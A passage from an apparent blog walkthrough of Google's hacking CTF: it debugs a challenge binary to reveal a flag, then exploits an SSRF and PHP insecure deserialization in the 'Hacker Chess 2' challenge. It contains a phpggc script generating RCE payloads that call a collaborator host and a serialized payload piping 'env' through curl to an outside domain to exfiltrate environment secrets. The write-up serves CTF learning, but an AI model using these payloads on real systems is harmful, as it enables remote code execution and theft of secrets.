<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a>0x0000555555583000  _init
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a>0x0000555555583030  free@plt
<a id="__codelineno-9-6" name="__codelineno-9-6" href="#__codelineno-9-6"></a>0x0000555555583040  write@plt
<a id="__codelineno-9-7" name="__codelineno-9-7" href="#__codelineno-9-7"></a>0x0000555555583050  strlen@plt
<a id="__codelineno-9-8" name="__codelineno-9-8" href="#__codelineno-9-8"></a>0x0000555555583060  memset@plt
<a id="__codelineno-9-9" name="__codelineno-9-9" href="#__codelineno-9-9"></a>0x0000555555583070  memcpy@plt
<a id="__codelineno-9-10" name="__codelineno-9-10" href="#__codelineno-9-10"></a>0x0000555555583080  time@plt
<a id="__codelineno-9-11" name="__codelineno-9-11" href="#__codelineno-9-11"></a>0x0000555555583090  malloc@plt
<a id="__codelineno-9-12" name="__codelineno-9-12" href="#__codelineno-9-12"></a>0x00005555555830a0  __cxa_finalize@plt
<a id="__codelineno-9-13" name="__codelineno-9-13" href="#__codelineno-9-13"></a>0x00005555555830b0  _start
<a id="__codelineno-9-14" name="__codelineno-9-14" href="#__codelineno-9-14"></a>0x00005555555830e0  deregister_tm_clones
<a id="__codelineno-9-15" name="__codelineno-9-15" href="#__codelineno-9-15"></a>0x0000555555583110  register_tm_clones
<a id="__codelineno-9-16" name="__codelineno-9-16" href="#__codelineno-9-16"></a>0x0000555555583150  __do_global_dtors_aux
<a id="__codelineno-9-17" name="__codelineno-9-17" href="#__codelineno-9-17"></a>0x0000555555583190  frame_dummy
<a id="__codelineno-9-18" name="__codelineno-9-18" href="#__codelineno-9-18"></a>0x0000555555583199  sha1_rotate
<a id="__codelineno-9-19" name="__codelineno-9-19" href="#__codelineno-9-19"></a>0x00005555555831b4  sha1_preprocess
<a id="__codelineno-9-20" name="__codelineno-9-20" href="#__codelineno-9-20"></a>0x000055555558329c  sha1_hash
<a id="__codelineno-9-21" name="__codelineno-9-21" href="#__codelineno-9-21"></a>0x00005555555835ca  count_ones
<a id="__codelineno-9-22" name="__codelineno-9-22" href="#__codelineno-9-22"></a>0x00005555555835f7  extract31
<a id="__codelineno-9-23" name="__codelineno-9-23" href="#__codelineno-9-23"></a>0x00005555555836c4  time_now
<a id="__codelineno-9-24" name="__codelineno-9-24" href="#__codelineno-9-24"></a>0x0000555555583747  totp
<a id="__codelineno-9-25" name="__codelineno-9-25" href="#__codelineno-9-25"></a>0x000055555558378e  correct_code
<a id="__codelineno-9-26" name="__codelineno-9-26" href="#__codelineno-9-26"></a><span class="hll">0x0000555555583817  print
</span><a id="__codelineno-9-27" name="__codelineno-9-27" href="#__codelineno-9-27"></a>0x0000555555583876  main
</code></pre></div>
<p>We can use start to run the program and automatically break on <code>main ()</code>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a>(gdb) start
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a>Temporary breakpoint 1 at 0x2f87a
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a>Starting program: /home/alois_thevenot/wannacry
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a>Temporary breakpoint 1, 0x000055555558387a in main ()
</code></pre></div>
<p>We can now manually call the <code>print</code> function which will display the URL used to retrieve the flag:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a>(gdb) p (void) 0x0000555555583817 ()
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a>https://wannacry-killswitch-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com//ocelot$1 = void
</code></pre></div>
<p>Flag: https://h4ck1ng.google/solve/who_turned_off_the_lights</p>
<div class="admonition info">
<p class="admonition-title">Info</p>
<p>I wasn't able to debug the binary inside Docker since apparantly QEMU's user-mode emulation does not support the ptrace system call.</p>
</div>
<h2 id="challenge-03-hacker-chess-2">Challenge 03 - Hacker Chess 2<a class="headerlink" href="#challenge-03-hacker-chess-2" title="Permanent link">&para;</a></h2>
<p><a href="/blog/hacking-google-ep000-operation-aurora/#challenge-01-hacker-chess">Hacker Chess is back</a>, sadly the SQL injection is not present anymore so we will need to find another way to beat the AI.</p>
<p>The first thing I thought about was to check the potential insecure deserialization vulnerability<sup id="fnref:insecure-deserialization"><a class="footnote-ref" href="#fn:insecure-deserialization">2</a></sup> since when you move a piece on the board a GET request is sent along with a base64 encoded serialized string: <code>GET /?move_end=YToyOntpOjA7czoyOiJmMiI7aToxO3M6MjoiZjQiO30=</code>, decoded it looks like this: <code>a:2:{i:0;s:2:"f2";i:1;s:2:"f4";}</code> which translates to move the piece in <code>F2</code> to <code>F4</code>.</p>
<p>To exploit a deserialization vulnerability you need a vulnerable class implementing magic methods such as <code>__toString</code>, <code>__destruct</code> or <code>__wakeup</code>. Since we don't have the source code and no idea about what vulnerable classes could be loaded the only thing we can try so far is to send known payload exploiting common vulnerable classes.</p>
<p>I used this script by <a href="https://twitter.com/honoki">honoki</a> to generate all the RCE payload for every gadget chain in <a href="https://github.com/ambionics/phpggc">phpggc</a> but this did not work:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="ch">#!/bin/bash</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="c1"># phpggc wrapper that automatically generates payloads for RCE gadgets</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="k">function</span><span class="o">=</span><span class="s2">&quot;system&quot;</span>
<a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a><span class="nv">command</span><span class="o">=</span><span class="s2">&quot;wget http://your.burpcollaborator.net/?&quot;</span>
<a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a><span class="c1"># modify the options below depending on your use case</span>
<a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a><span class="nv">options</span><span class="o">=</span><span class="s2">&quot;-a -b -u -f&quot;</span>
<a id="__codelineno-12-9" name="__codelineno-12-9" href="#__codelineno-12-9"></a>
<a id="__codelineno-12-10" name="__codelineno-12-10" href="#__codelineno-12-10"></a><span class="c1"># generate gadget chains</span>
<a id="__codelineno-12-11" name="__codelineno-12-11" href="#__codelineno-12-11"></a>./phpggc<span class="w"> </span>-l<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>RCE<span class="w"> </span><span class="p">|</span><span class="w"> </span>cut<span class="w"> </span>-d<span class="s1">&#39; &#39;</span><span class="w"> </span>-f1<span class="w"> </span><span class="p">|</span><span class="w"> </span>xargs<span class="w"> </span>-L<span class="w"> </span><span class="m">1</span><span class="w"> </span>./phpggc<span class="w"> </span>-i<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span><span class="s1">&#39;phpggc &#39;</span><span class="w"> </span>--line-buffered<span class="w"> </span><span class="p">|</span>
<a id="__codelineno-12-12" name="__codelineno-12-12" href="#__codelineno-12-12"></a><span class="k">while</span><span class="w"> </span><span class="nb">read</span><span class="w"> </span>line<span class="p">;</span><span class="w">  </span><span class="k">do</span>
<a id="__codelineno-12-13" name="__codelineno-12-13" href="#__codelineno-12-13"></a><span class="w">   </span><span class="nv">gadget</span><span class="o">=</span><span class="k">$(</span><span class="nb">echo</span><span class="w"> </span><span class="nv">$line</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>cut<span class="w"> </span>-d<span class="s1">&#39; &#39;</span><span class="w"> </span>-f2<span class="k">)</span><span class="w"> </span><span class="o">&amp;&amp;</span>
<a id="__codelineno-12-14" name="__codelineno-12-14" href="#__codelineno-12-14"></a><span class="w">   </span><span class="k">if</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="nv">$line</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-q<span class="w"> </span><span class="s2">&quot;&lt;function&gt; &lt;parameter&gt;&quot;</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<a id="__codelineno-12-15" name="__codelineno-12-15" href="#__codelineno-12-15"></a><span class="w">      </span>./phpggc<span class="w"> </span><span class="nv">$options</span><span class="w"> </span><span class="nv">$gadget</span><span class="w"> </span><span class="s2">&quot;</span><span class="nv">$function</span><span class="s2">&quot;</span><span class="w"> </span><span class="s2">&quot;</span><span class="nv">$command</span><span class="s2">?</span><span class="k">$(</span>date<span class="w"> </span>+%s<span class="k">)</span><span class="s2">&quot;</span>
<a id="__codelineno-12-16" name="__codelineno-12-16" href="#__codelineno-12-16"></a><span class="w">   </span><span class="k">elif</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="nv">$line</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-q<span class="w"> </span><span class="s2">&quot;&lt;code&gt;&quot;</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<a id="__codelineno-12-17" name="__codelineno-12-17" href="#__codelineno-12-17"></a><span class="w">      </span>./phpggc<span class="w"> </span><span class="nv">$options</span><span class="w"> </span><span class="nv">$gadget</span><span class="w"> </span><span class="s2">&quot;</span><span class="nv">$function</span><span class="s2">(&#39;</span><span class="nv">$command</span><span class="s2">?</span><span class="k">$(</span>date<span class="w"> </span>+%s<span class="k">)</span><span class="s2">&#39;);&quot;</span>
<a id="__codelineno-12-18" name="__codelineno-12-18" href="#__codelineno-12-18"></a><span class="w">   </span><span class="k">elif</span><span class="w"> </span><span class="nb">echo</span><span class="w"> </span><span class="nv">$line</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>-q<span class="w"> </span><span class="s2">&quot;&lt;command&gt;&quot;</span><span class="p">;</span><span class="w"> </span><span class="k">then</span>
<a id="__codelineno-12-19" name="__codelineno-12-19" href="#__codelineno-12-19"></a><span class="w">      </span>./phpggc<span class="w"> </span><span class="nv">$options</span><span class="w"> </span><span class="nv">$gadget</span><span class="w"> </span><span class="s2">&quot;</span><span class="nv">$command</span><span class="s2">?</span><span class="k">$(</span>date<span class="w"> </span>+%s<span class="k">)</span><span class="s2">&quot;</span>
<a id="__codelineno-12-20" name="__codelineno-12-20" href="#__codelineno-12-20"></a><span class="w">   </span><span class="k">else</span>
<a id="__codelineno-12-21" name="__codelineno-12-21" href="#__codelineno-12-21"></a><span class="w">      </span>./phpggc<span class="w"> </span><span class="nv">$options</span><span class="w"> </span><span class="nv">$gadget</span>
<a id="__codelineno-12-22" name="__codelineno-12-22" href="#__codelineno-12-22"></a><span class="w">   </span><span class="k">fi</span><span class="p">;</span>
<a id="__codelineno-12-23" name="__codelineno-12-23" href="#__codelineno-12-23"></a><span class="k">done</span>
</code></pre></div>
<p>I then found out that there was a Server-side request forgery (SSRF)<sup id="fnref:ssrf"><a class="footnote-ref" href="#fn:ssrf">3</a></sup> in the feature used to start the game. This is a POST request with a parameter <code>filename</code> set to <code>baseboard.fen</code>. We can replace the value by a URL and the game will try to load it.</p>
<p>My first attempt was to load a <a href="https://gist.githubusercontent.com/Techbrunch/b0a72c4c1933a85b7c74726b0dc372ae/raw/d19b62c0036d68965218f9dc4e61ef08e104ff3d/baseboard.fen">custom FEN</a> with mate in one move for white. To do this I used a <a href="https://www.dailychess.com/chess/chess-fen-viewer.php">Chess FEN Viewer</a>.</p>
<div class="admonition info">
<p class="admonition-title">Info</p>
<p>Forsyth–Edwards Notation (FEN) is a standard notation for describing a particular board position of a chess game. The purpose of FEN is to provide all the necessary information to restart a game from a particular position.</p>
</div>
<p>It worked but this time winning wasn't enough anymore:</p>
<blockquote>
<p>Winning against me won't help anymore. You need to get the flag from my envs.</p>
</blockquote>
<p>Turns out we can use the same vulnerability to read the source code of the application, if we set the <code>filename</code> value to <code>index.php</code>, the content of <code>index.php</code> will be returned as part of the response. </p>
<p>We can see that the class <code>Stockfish</code> implements the <code>__wakeup</code> that we could use to execute arbitrary command. Now we have everything we need to exploit the deserialization vulnerability.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="k">class</span> <span class="nc">Stockfish</span>
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a><span class="p">{</span>
<a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a>    <span class="k">public</span> <span class="nv">$cwd</span> <span class="o">=</span> <span class="s2">&quot;./&quot;</span><span class="p">;</span>
<a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a>    <span class="k">public</span> <span class="nv">$binary</span> <span class="o">=</span> <span class="s2">&quot;/usr/games/stockfish&quot;</span><span class="p">;</span>
<a id="__codelineno-13-6" name="__codelineno-13-6" href="#__codelineno-13-6"></a>    <span class="k">public</span> <span class="nv">$other_options</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">&#39;bypass_shell&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;true&#39;</span><span class="p">);</span>
<a id="__codelineno-13-7" name="__codelineno-13-7" href="#__codelineno-13-7"></a>    <span class="k">public</span> <span class="nv">$descriptorspec</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
<a id="__codelineno-13-8" name="__codelineno-13-8" href="#__codelineno-13-8"></a>        <span class="mi">0</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&quot;pipe&quot;</span><span class="p">,</span><span class="s2">&quot;r&quot;</span><span class="p">),</span>
<a id="__codelineno-13-9" name="__codelineno-13-9" href="#__codelineno-13-9"></a>                <span class="mi">1</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&quot;pipe&quot;</span><span class="p">,</span><span class="s2">&quot;w&quot;</span><span class="p">),</span>
<a id="__codelineno-13-10" name="__codelineno-13-10" href="#__codelineno-13-10"></a>    <span class="p">);</span>
<a id="__codelineno-13-11" name="__codelineno-13-11" href="#__codelineno-13-11"></a>    <span class="k">private</span> <span class="nv">$process</span><span class="p">;</span>
<a id="__codelineno-13-12" name="__codelineno-13-12" href="#__codelineno-13-12"></a>    <span class="k">private</span> <span class="nv">$pipes</span><span class="p">;</span>
<a id="__codelineno-13-13" name="__codelineno-13-13" href="#__codelineno-13-13"></a>    <span class="k">private</span> <span class="nv">$thinking_time</span><span class="p">;</span>
<a id="__codelineno-13-14" name="__codelineno-13-14" href="#__codelineno-13-14"></a>
<a id="__codelineno-13-15" name="__codelineno-13-15" href="#__codelineno-13-15"></a>    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">()</span>
<a id="__codelineno-13-16" name="__codelineno-13-16" href="#__codelineno-13-16"></a>    <span class="p">{</span>
<a id="__codelineno-13-17" name="__codelineno-13-17" href="#__codelineno-13-17"></a>        <span class="nv">$other_options</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">&#39;bypass_shell&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;true&#39;</span><span class="p">);</span>
<a id="__codelineno-13-18" name="__codelineno-13-18" href="#__codelineno-13-18"></a>        <span class="c1">//echo &quot;Stockfish options&quot; . $_SESSION[&#39;thinking_time&#39;];</span>
<a id="__codelineno-13-19" name="__codelineno-13-19" href="#__codelineno-13-19"></a>        <span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;thinking_time&#39;</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nb">is_numeric</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;thinking_time&#39;</span><span class="p">]))</span> <span class="p">{</span>
<a id="__codelineno-13-20" name="__codelineno-13-20" href="#__codelineno-13-20"></a>            <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">thinking_time</span> <span class="o">=</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;thinking_time&#39;</span><span class="p">];</span>
<a id="__codelineno-13-21" name="__codelineno-13-21" href="#__codelineno-13-21"></a>        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<a id="__codelineno-13-22" name="__codelineno-13-22" href="#__codelineno-13-22"></a>            <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">thinking_time</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
<a id="__codelineno-13-23" name="__codelineno-13-23" href="#__codelineno-13-23"></a>        <span class="p">}</span>
<a id="__codelineno-13-24" name="__codelineno-13-24" href="#__codelineno-13-24"></a>        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">process</span> <span class="o">=</span> <span class="nb">proc_open</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">binary</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">descriptorspec</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">cwd</span><span class="p">,</span> <span class="k">null</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">other_options</span><span class="p">)</span> <span class="p">;</span>
<a id="__codelineno-13-25" name="__codelineno-13-25" href="#__codelineno-13-25"></a>    <span class="p">}</span>
<a id="__codelineno-13-26" name="__codelineno-13-26" href="#__codelineno-13-26"></a>    <span class="k">public</span> <span class="k">function</span> <span class="nf">passUci</span><span class="p">()</span>
<a id="__codelineno-13-27" name="__codelineno-13-27" href="#__codelineno-13-27"></a>    <span class="p">{</span>
<a id="__codelineno-13-28" name="__codelineno-13-28" href="#__codelineno-13-28"></a>        <span class="k">if</span> <span class="p">(</span><span class="nb">is_resource</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">process</span><span class="p">))</span> <span class="p">{</span>
<a id="__codelineno-13-29" name="__codelineno-13-29" href="#__codelineno-13-29"></a>            <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">&quot;uci</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-13-30" name="__codelineno-13-30" href="#__codelineno-13-30"></a>            <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">&quot;ucinewgame</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-13-31" name="__codelineno-13-31" href="#__codelineno-13-31"></a>            <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">&quot;isready</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-13-32" name="__codelineno-13-32" href="#__codelineno-13-32"></a>        <span class="p">}</span>
<a id="__codelineno-13-33" name="__codelineno-13-33" href="#__codelineno-13-33"></a>    <span class="p">}</span>
<a id="__codelineno-13-34" name="__codelineno-13-34" href="#__codelineno-13-34"></a>
<a id="__codelineno-13-35" name="__codelineno-13-35" href="#__codelineno-13-35"></a>    <span class="k">public</span> <span class="k">function</span> <span class="nf">passPosition</span><span class="p">(</span><span class="nx">string</span> <span class="nv">$fen</span><span class="p">)</span>
<a id="__codelineno-13-36" name="__codelineno-13-36" href="#__codelineno-13-36"></a>    <span class="p">{</span>
<a id="__codelineno-13-37" name="__codelineno-13-37" href="#__codelineno-13-37"></a>        <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">&quot;position fen </span><span class="si">$fen</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-13-38" name="__codelineno-13-38" href="#__codelineno-13-38"></a>        <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">&quot;go movetime </span><span class="si">$this-&gt;thinking_time</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-13-39" name="__codelineno-13-39" href="#__codelineno-13-39"></a>    <span class="p">}</span>
<a id="__codelineno-13-40" name="__codelineno-13-40" href="#__codelineno-13-40"></a>
<a id="__codelineno-13-41" name="__codelineno-13-41" href="#__codelineno-13-41"></a>    <span class="k">public</span> <span class="k">function</span> <span class="nf">readOutput</span><span class="p">()</span>
<a id="__codelineno-13-42" name="__codelineno-13-42" href="#__codelineno-13-42"></a>    <span class="p">{</span>
<a id="__codelineno-13-43" name="__codelineno-13-43" href="#__codelineno-13-43"></a>        <span class="k">while</span> <span class="p">(</span><span class="k">true</span><span class="p">)</span> <span class="p">{</span>
<a id="__codelineno-13-44" name="__codelineno-13-44" href="#__codelineno-13-44"></a>            <span class="nb">usleep</span><span class="p">(</span><span class="mi">100</span><span class="p">);</span>
<a id="__codelineno-13-45" name="__codelineno-13-45" href="#__codelineno-13-45"></a>            <span class="nv">$s</span> <span class="o">=</span> <span class="nb">fgets</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">4096</span><span class="p">);</span>
<a id="__codelineno-13-46" name="__codelineno-13-46" href="#__codelineno-13-46"></a>            <span class="nv">$str</span> <span class="o">.=</span> <span class="nv">$s</span><span class="p">;</span>
<a id="__codelineno-13-47" name="__codelineno-13-47" href="#__codelineno-13-47"></a>            <span class="k">if</span> <span class="p">(</span><span class="nb">strpos</span><span class="p">(</span><span class="s1">&#39; &#39;</span><span class="o">.</span><span class="nv">$s</span><span class="p">,</span> <span class="s1">&#39;bestmove&#39;</span><span class="p">))</span> <span class="p">{</span>
<a id="__codelineno-13-48" name="__codelineno-13-48" href="#__codelineno-13-48"></a>                <span class="k">break</span><span class="p">;</span>
<a id="__codelineno-13-49" name="__codelineno-13-49" href="#__codelineno-13-49"></a>            <span class="p">}</span>
<a id="__codelineno-13-50" name="__codelineno-13-50" href="#__codelineno-13-50"></a>        <span class="p">}</span>
<a id="__codelineno-13-51" name="__codelineno-13-51" href="#__codelineno-13-51"></a>        <span class="k">return</span> <span class="nv">$s</span><span class="p">;</span>
<a id="__codelineno-13-52" name="__codelineno-13-52" href="#__codelineno-13-52"></a>    <span class="p">}</span>
<a id="__codelineno-13-53" name="__codelineno-13-53" href="#__codelineno-13-53"></a>
<a id="__codelineno-13-54" name="__codelineno-13-54" href="#__codelineno-13-54"></a>    <span class="k">public</span> <span class="k">function</span> <span class="fm">__toString</span><span class="p">()</span>
<a id="__codelineno-13-55" name="__codelineno-13-55" href="#__codelineno-13-55"></a>    <span class="p">{</span>
<a id="__codelineno-13-56" name="__codelineno-13-56" href="#__codelineno-13-56"></a>        <span class="k">return</span> <span class="nb">fgets</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">4096</span><span class="p">);</span>
<a id="__codelineno-13-57" name="__codelineno-13-57" href="#__codelineno-13-57"></a>    <span class="p">}</span>
<a id="__codelineno-13-58" name="__codelineno-13-58" href="#__codelineno-13-58"></a>
<a id="__codelineno-13-59" name="__codelineno-13-59" href="#__codelineno-13-59"></a>    <span class="k">public</span> <span class="k">function</span> <span class="fm">__wakeup</span><span class="p">()</span>
<a id="__codelineno-13-60" name="__codelineno-13-60" href="#__codelineno-13-60"></a>    <span class="p">{</span>
<a id="__codelineno-13-61" name="__codelineno-13-61" href="#__codelineno-13-61"></a>        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">process</span> <span class="o">=</span> <span class="nb">proc_open</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">binary</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">descriptorspec</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">cwd</span><span class="p">,</span> <span class="k">null</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">other_options</span><span class="p">)</span> <span class="p">;</span>
<a id="__codelineno-13-62" name="__codelineno-13-62" href="#__codelineno-13-62"></a>        <span class="k">echo</span> <span class="s1">&#39;&lt;!--&#39;</span><span class="o">.</span><span class="s1">&#39;wakeupcalled&#39;</span><span class="o">.</span><span class="nb">fgets</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">4096</span><span class="p">)</span><span class="o">.</span><span class="s1">&#39;--&gt;&#39;</span><span class="p">;</span>
<a id="__codelineno-13-63" name="__codelineno-13-63" href="#__codelineno-13-63"></a>    <span class="p">}</span>
<a id="__codelineno-13-64" name="__codelineno-13-64" href="#__codelineno-13-64"></a><span class="p">}</span>
</code></pre></div>
<p>This small PHP code will generate our base64 encoded payload:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a><span class="k">class</span> <span class="nc">Stockfish</span>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="p">{</span>
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a>    <span class="k">public</span> <span class="nv">$cwd</span> <span class="o">=</span> <span class="s2">&quot;./&quot;</span><span class="p">;</span>
<a id="__codelineno-14-6" name="__codelineno-14-6" href="#__codelineno-14-6"></a>    <span class="k">public</span> <span class="nv">$binary</span> <span class="o">=</span> <span class="s1">&#39;env|base64| curl -X POST --data-binary @- a8jxxhwp8su07krjp21elz93musrgg.oastify.com&#39;</span><span class="p">;</span>
<a id="__codelineno-14-7" name="__codelineno-14-7" href="#__codelineno-14-7"></a>    <span class="k">public</span> <span class="nv">$other_options</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">&#39;bypass_shell&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;true&#39;</span><span class="p">);</span>
<a id="__codelineno-14-8" name="__codelineno-14-8" href="#__codelineno-14-8"></a>    <span class="k">public</span> <span class="nv">$descriptorspec</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
<a id="__codelineno-14-9" name="__codelineno-14-9" href="#__codelineno-14-9"></a>        <span class="mi">0</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&quot;pipe&quot;</span><span class="p">,</span><span class="s2">&quot;r&quot;</span><span class="p">),</span>
<a id="__codelineno-14-10" name="__codelineno-14-10" href="#__codelineno-14-10"></a>                <span class="mi">1</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">&quot;pipe&quot;</span><span class="p">,</span><span class="s2">&quot;w&quot;</span><span class="p">),</span>
<a id="__codelineno-14-11" name="__codelineno-14-11" href="#__codelineno-14-11"></a>    <span class="p">);</span>
<a id="__codelineno-14-12" name="__codelineno-14-12" href="#__codelineno-14-12"></a><span class="p">}</span>
<a id="__codelineno-14-13" name="__codelineno-14-13" href="#__codelineno-14-13"></a>
<a id="__codelineno-14-14" name="__codelineno-14-14" href="#__codelineno-14-14"></a><span class="nv">$a</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Stockfish</span><span class="p">();</span>
<a id="__codelineno-14-15" name="__codelineno-14-15" href="#__codelineno-14-15"></a><span class="nv">$b</span> <span class="o">=</span> <span class="nb">serialize</span><span class="p">(</span><span class="nv">$a</span><span class="p">);</span>
<a id="__codelineno-14-16" name="__codelineno-14-16" href="#__codelineno-14-16"></a>
<a id="__codelineno-14-17" name="__codelineno-14-17" href="#__codelineno-14-17"></a><span class="k">echo</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$b</span><span class="p">);</span>
</code></pre></div>
<p>Once we send the request we will receive the content of environment variable via our Burp collaborator instance.</p>
<p>Flag: https://h4ck1ng.google/solve/rc3_l1k3_4_tru3_ch355_m45t3r</p>
<div class="footnote">
<hr />
<ol>
<li id="fn:docker-for-pentester">
<p><a href="https://blog.ropnop.com/docker-for-pentesters/">Docker for Pentesters</a>&#160;<a class="footnote-backref" href="#fnref:docker-for-pentester" title="Jump back to footnote 1 in the text">&#8617;</a></p>
</li>
<li id="fn:insecure-deserialization">
<p><a href="https://portswigger.net/web-security/deserialization">Insecure deserialization</a>&#160;<a class="footnote-backref" href="#fnref:insecure-deserialization" title="Jump back to footnote 2 in the text">&#8617;</a></p>
</li>
<li id="fn:ssrf">
